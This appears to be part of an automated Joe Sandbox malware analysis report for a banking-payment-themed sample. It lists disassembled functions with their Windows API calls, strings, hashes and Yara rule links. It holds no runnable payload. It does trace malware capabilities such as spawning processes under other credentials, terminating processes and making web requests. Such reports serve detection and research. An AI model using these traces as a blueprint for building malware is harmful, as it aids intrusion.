Instruction ID: f713ba195cb11ca32f8170d198611268abb3d54169ebc9bd7b99248d46a346ac
Opcode Fuzzy Hash: b0daf58389a5c762ba2d8882de04b94aad5baa31403b24ea7d69d96f94881aa3
Instruction Fuzzy Hash: A611AF31651209FFDF509FA4DC09BBE7B68EB85351F10C028E99997210CB3AAD00DF62

Function 007785B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007785E2
OpenProcessToken.ADVAPI32(00000000), ref: 007785E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007785F8
CloseHandle.KERNEL32(00000004), ref: 00778603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00778632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00778646

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 15d927ab8d421becf6f09306eb15da98b5074e54fc012b84521065f5a35ec5ad
Instruction ID: ca4c24a1386c1f28c999feacb50d788c2495c61c9034989a25fefdcb9c90f274
Opcode Fuzzy Hash: 15d927ab8d421becf6f09306eb15da98b5074e54fc012b84521065f5a35ec5ad
Instruction Fuzzy Hash: AD115C72540209ABDF018FA4DD49BDE7BA9EF49344F048064FE04A2161C7798D60DB61

Function 0077B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0077B7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 0077B7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0077B7CD
ReleaseDC.USER32(00000000,00000000), ref: 0077B7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0077B7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 0077B7FE

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 9d017dc68154a3b2a5dcdf264163cd28cc8bec193c864735a5bb30db0e341c04
Instruction ID: fec0bf978dd809e84cacea3162429169609f4eaf8c839c4d434e40dd354b9bd5
Opcode Fuzzy Hash: 9d017dc68154a3b2a5dcdf264163cd28cc8bec193c864735a5bb30db0e341c04
Instruction Fuzzy Hash: E5018475E00209BBEF109BE69C49B5EBFB8EB89351F008076FA08A7291D6749C00CF91

Function 00740162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00740193
MapVirtualKeyW.USER32(00000010,00000000), ref: 0074019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 007401A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 007401B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 007401B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 007401C1

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 4fd732c8a6342e269fae53997258d880f1cdde691132cb4d6c3b83c21fafd411
Instruction ID: 685d4c9aedf825331d65fec0b1493d44f1ee6c59dc3749111009f8899a73f457
Opcode Fuzzy Hash: 4fd732c8a6342e269fae53997258d880f1cdde691132cb4d6c3b83c21fafd411
Instruction Fuzzy Hash: 68016CB0901759BDE3008F5A8C85B52FFA8FF59354F00411BE15C47941C7F5A864CBE5

Function 007853E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007853F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0078540F
GetWindowThreadProcessId.USER32(?,?), ref: 0078541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0078542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00785437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0078543E

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 2b3e96bf1490858b58e758a256bcb7903063a1b8588b64266cc7f5bd7aef5944
Instruction ID: 112b3868f22b926845a73aef411f400dd9f87b699b7392334037bb785b696de2
Opcode Fuzzy Hash: 2b3e96bf1490858b58e758a256bcb7903063a1b8588b64266cc7f5bd7aef5944
Instruction Fuzzy Hash: 1CF01D32241558BBE7215BE2DC0DEAB7A7CEBC7B11F004169FA04D105196A91A0186B9

Function 00787230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00787243
EnterCriticalSection.KERNEL32(?,?,00730EE4,?,?), ref: 00787254
TerminateThread.KERNEL32(00000000,000001F6,?,00730EE4,?,?), ref: 00787261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00730EE4,?,?), ref: 0078726E

Part of subcall function 00786C35: CloseHandle.KERNEL32(00000000,?,0078727B,?,00730EE4,?,?), ref: 00786C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00787281
LeaveCriticalSection.KERNEL32(?,?,00730EE4,?,?), ref: 00787288

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 91b2c7cd35ac62536f2fe4c8c9d5fed4ebd1dbc9ddbfea80becdad159f431893
Instruction ID: 2174be6014fd009612239c3a0dd3f8c39e6122e1c224bfb014a955c2dd4babc0
Opcode Fuzzy Hash: 91b2c7cd35ac62536f2fe4c8c9d5fed4ebd1dbc9ddbfea80becdad159f431893
Instruction Fuzzy Hash: 16F05E36580612EBD7622BA4ED4CAEE7739FF86702B104531F503910E0DB7E5801CB65

Function 00778992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0077899D
UnloadUserProfile.USERENV(?,?), ref: 007789A9
CloseHandle.KERNEL32(?), ref: 007789B2
CloseHandle.KERNEL32(?), ref: 007789BA
GetProcessHeap.KERNEL32(00000000,?), ref: 007789C3
HeapFree.KERNEL32(00000000), ref: 007789CA

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 9ab8ec639aa8b211b20c3da97d477db76047b278b91c9a3feb2fd2e680dae82c
Instruction ID: 1e0f9e00f1c58845619aaaee6a4c18a825a487c4364254ba2885794ad36ff462
Opcode Fuzzy Hash: 9ab8ec639aa8b211b20c3da97d477db76047b278b91c9a3feb2fd2e680dae82c
Instruction Fuzzy Hash: 35E05276104505FFDB011FE5EC0C95ABF69FBCA762B508631F21981470CB3A9861DF58

Function 00777530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,007B2C7C,?), ref: 007776EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,007B2C7C,?), ref: 00777702
CLSIDFromProgID.OLE32(?,?,00000000,007AFB80,000000FF,?,00000000,00000800,00000000,?,007B2C7C,?), ref: 00777727
_memcmp.LIBCMT ref: 00777748

Strings

,,{, xrefs: 0077753D

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,{
API String ID: 314563124-821077388
Opcode ID: 82d6e85cda5e35b07252caaa982675004da55439b63232a100d19347df85bd86
Instruction ID: 1a264a3bb5224b316d39946f6d99de2f1f5cbf9f7e5f297a6d13a717ec9d5aa7
Opcode Fuzzy Hash: 82d6e85cda5e35b07252caaa982675004da55439b63232a100d19347df85bd86
Instruction Fuzzy Hash: 1D810B75A00109EFCF08DFA4C984EEEB7B9FF89355F208558E505AB250DB75AE06CB60

Function 007985ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00798613
CharUpperBuffW.USER32(?,?), ref: 00798722
VariantClear.OLEAUT32(?), ref: 0079889A

Part of subcall function 00787562: VariantInit.OLEAUT32(00000000), ref: 007875A2
Part of subcall function 00787562: VariantCopy.OLEAUT32(00000000,?), ref: 007875AB
Part of subcall function 00787562: VariantClear.OLEAUT32(00000000), ref: 007875B7

Strings

Incorrect Parameter format, xrefs: 0079864B, 0079880D
AUTOIT.ERROR, xrefs: 00798728

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: c9908db92141134454542961a0569c14c648a65c3ec3ef8845d6f71f6e91258d
Instruction ID: a89358e7b7fe910d7310a8bf04f9b0e5c24f3ec29f72353a0030dc7634dcde3e
Opcode Fuzzy Hash: c9908db92141134454542961a0569c14c648a65c3ec3ef8845d6f71f6e91258d
Instruction Fuzzy Hash: 70919F70608301DFCB40DF24D48495ABBF4EF8A714F14892EF98A8B362DB35E945CB92

Function 00782A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0073FC86: _wcscpy.LIBCMT ref: 0073FCA9

_memset.LIBCMT ref: 00782B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00782BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00782C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00782C97

Strings

0, xrefs: 00782B73

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 086eebbdaf87714a330a9aa4408e7f5fa263d6657121f78345d0f24d13b9bdc2
Instruction ID: 82877e079fa19d3c66a87494f05b22479cf9b2aebc6ea069b213adc4eea2642b
Opcode Fuzzy Hash: 086eebbdaf87714a330a9aa4408e7f5fa263d6657121f78345d0f24d13b9bdc2
Instruction Fuzzy Hash: F951C1B16493009AD724AF28D84967F7BE4EF49321F044A2DF895D61E2DB78CC0687A2

Function 00733137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00733277
_memmove.LIBCMT ref: 00733310
_free.LIBCMT ref: 00733336
_memmove.LIBCMT ref: 007333E9

Strings

_s, xrefs: 00733322
3cs, xrefs: 00733225

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _memmove$_free
String ID: 3cs$_s
API String ID: 2620147621-944816363
Opcode ID: 12f00d24251fa76a1ec51fa7898df28480c8615f21e29221eb68ab40e19edd44
Instruction ID: 353d8154226009b2499e2dd679fdfcd58f90823960bfa041da5cfb0f038c5e39
Opcode Fuzzy Hash: 12f00d24251fa76a1ec51fa7898df28480c8615f21e29221eb68ab40e19edd44
Instruction Fuzzy Hash: C4515D71A043419FEB25CF28C440B6ABBF5BF85310F44492DE999C7352DB39E945CB82

Function 00736192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00736248
_memmove.LIBCMT ref: 007362E4
_memset.LIBCMT ref: 00736308

Strings

3cs, xrefs: 007362AF
ERCP, xrefs: 007361B3

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _memset$_memmove
String ID: 3cs$ERCP
API String ID: 2532777613-503592135
Opcode ID: 2181e902178b21c3e6679f6955dab7c6f9f6a91ff5ed27e3960a51425af60928
Instruction ID: 232dc5220e54fc0b056ca28959520a566f532a55447864a2daf384d0bc8ff03a
Opcode Fuzzy Hash: 2181e902178b21c3e6679f6955dab7c6f9f6a91ff5ed27e3960a51425af60928
Instruction Fuzzy Hash: 40519071A00705EBEB24DF65C8457ABB7F4BF04314F20857EE54ACB282E778AA44CB80

Function 00782753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007827C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007827DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00782822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007E5890,00000000), ref: 0078286B

Strings

0, xrefs: 007827B5

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 3d6aeb782878df142c66653478d46e28dd6e7360bf73643e02a88f30c61c624a
Instruction ID: b6d888a9eb9fd78a8329da66677b8ad6bce2a4bd3d83fb046194d17f6ac6a099
Opcode Fuzzy Hash: 3d6aeb782878df142c66653478d46e28dd6e7360bf73643e02a88f30c61c624a
Instruction Fuzzy Hash: E541A270644341AFDB24EF24CC48B1ABBE4EF85315F14492EF965D7292D738E906CB62

Function 0079D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0079D7C5

Part of subcall function 0072784B: _memmove.LIBCMT ref: 00727899

Strings

stdcall, xrefs: 0079D847
winapi, xrefs: 0079D836
cdecl, xrefs: 0079D81C
none, xrefs: 0079D8A0

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 47c24c7c337ea242c003bf0a21570a919fb9662a1a66633ab9ec4888ee577cb7
Instruction ID: 5c63a95dc381d3cc22f557c20042906f7a143dda015c0cf7c9530403f0c10649
Opcode Fuzzy Hash: 47c24c7c337ea242c003bf0a21570a919fb9662a1a66633ab9ec4888ee577cb7
Instruction Fuzzy Hash: 0E31CF71A04619EBCF14EF94D855DBEB3B4FF01320B00862AE869973D2DB39AD05CB80

Function 00778E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22

Part of subcall function 0077AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0077AABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00778F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00778F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00778F57

Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06

Strings

ListBox, xrefs: 00778ED3
ComboBox, xrefs: 00778E9E

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 0f574cf4efa123c110e80b38a2dc924e78c1e122706e6b86e16df93bc43fd938
Instruction ID: 346a780887f9b4a278f21451af9b5cff8264e8024772286f229566d6dea51f80
Opcode Fuzzy Hash: 0f574cf4efa123c110e80b38a2dc924e78c1e122706e6b86e16df93bc43fd938
Instruction Fuzzy Hash: BC21EE71A40104BEDF18ABB0DC8DDFEB769DF463A0F048129F429A62E0DB3D5809D660

Function 0079182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0079184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00791872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007918A2
InternetCloseHandle.WININET(00000000), ref: 007918E9

Part of subcall function 00792483: GetLastError.KERNEL32(?,?,00791817,00000000,00000000,00000001), ref: 00792498
Part of subcall function 00792483: SetEvent.KERNEL32(?,?,00791817,00000000,00000000,00000001), ref: 007924AD

Strings

, xrefs: 00791893

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 8761f72ba59f9d50962a8491481174caa4869e3416d62b97b945c66489f91fc6
Instruction ID: e14ba4c1ea09331d8ab2eedd2621f842364998b4b68ae5c71474b76412e9237d
Opcode Fuzzy Hash: 8761f72ba59f9d50962a8491481174caa4869e3416d62b97b945c66489f91fc6
Instruction Fuzzy Hash: A821D4B5500309BFEF11AFA0EC89EBF77EDEB89754F50412AF40596140DB289D15A7A0

Function 007A63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00721D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00721D73
Part of subcall function 00721D35: GetStockObject.GDI32(00000011), ref: 00721D87
Part of subcall function 00721D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00721D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007A6461
LoadLibraryW.KERNEL32(?), ref: 007A6468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007A647D
DestroyWindow.USER32(?), ref: 007A6485

Strings

SysAnimate32, xrefs: 007A643C

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: b6617208152856517fc717ab4d75cb2cb3472b012ddf9ff26c11b47d150bec80
Instruction ID: 1db059c1183952c4df96fd3d52285e7d3aaad5ff6773f52a24267fbb39830e1c
Opcode Fuzzy Hash: b6617208152856517fc717ab4d75cb2cb3472b012ddf9ff26c11b47d150bec80
Instruction Fuzzy Hash: EA218EB1200245EBEF104FA4DC84EBA77A9EB9A724F188729FA1096190D779DC519760

